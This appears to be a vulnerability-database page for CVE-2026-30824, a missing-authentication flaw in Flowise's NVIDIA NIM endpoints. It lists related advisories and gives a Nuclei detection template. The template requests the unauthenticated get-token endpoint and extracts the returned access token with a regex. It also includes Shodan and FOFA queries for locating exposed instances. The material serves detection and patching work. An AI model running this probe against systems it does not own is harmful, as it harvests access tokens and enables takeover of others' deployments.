| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| Exploit for Missing Authentication for Critical Function in Flowiseai Flowise | 29 Apr 202616:18 | – | githubexploit | |
| CVE-2026-30824 | 7 Mar 202605:11 | – | attackerkb | |
| CVE-2026-30824 | 5 Mar 202621:31 | – | circl | |
| Flowise 访问控制错误漏洞 | 7 Mar 202600:00 | – | cnnvd | |
| CVE-2026-30824 | 7 Mar 202605:11 | – | cve | |
| CVE-2026-30824 Flowise: Missing Authentication on NVIDIA NIM Endpoints | 7 Mar 202605:11 | – | cvelist | |
| Flowise Missing Authentication on NVIDIA NIM Endpoints | 6 Mar 202622:21 | – | github | |
| CVE-2026-30824 | 7 Mar 202606:16 | – | nvd | |
| CVE-2026-30824 Flowise: Missing Authentication on NVIDIA NIM Endpoints | 7 Mar 202605:11 | – | osv | |
| GHSA-5F53-522J-J454 Flowise Missing Authentication on NVIDIA NIM Endpoints | 6 Mar 202622:21 | – | osv |
id: CVE-2026-30824
info:
name: Flowise - NVIDIA NIM Endpoints Missing Authentication
author: DhiyaneshDk
severity: high
description: |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.
impact: |
Unauthenticated attackers can access privileged container management and token generation, potentially leading to full system compromise.
remediation: This issue has been patched in version 3.0.13
reference:
- https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454
- https://nvd.nist.gov/vuln/detail/CVE-2026-30824
- https://github.com/FlowiseAI/Flowise
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2026-30824
epss-score: 0.3625
epss-percentile: 0.98289
cwe-id: CWE-306
metadata:
max-request: 2
vendor: flowiseai
product: flowise
shodan-query: title:"Flowise"
fofa-query: title="Flowise"
tags: cve,cve2026,flowise,nvidia,nim,unauth,auth-bypass,token-leak
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/nvidia-nim/get-token"
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains_all(body, 'access_token','token_type')"
condition: and
extractors:
- type: regex
name: access_token
group: 1
regex:
- '"access_token"\s*:\s*"([^"]+)"'
part: body
# digest: 4a0a00473045022002fc6985b0c836d377cf177227d0c17bc9126a8bd77f842dc3cf5664c143f09a022100e982b087e8d2c4c1aa05aaf1f8f21fe51cb8793d981e51b0cc0a49a97528cfce:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation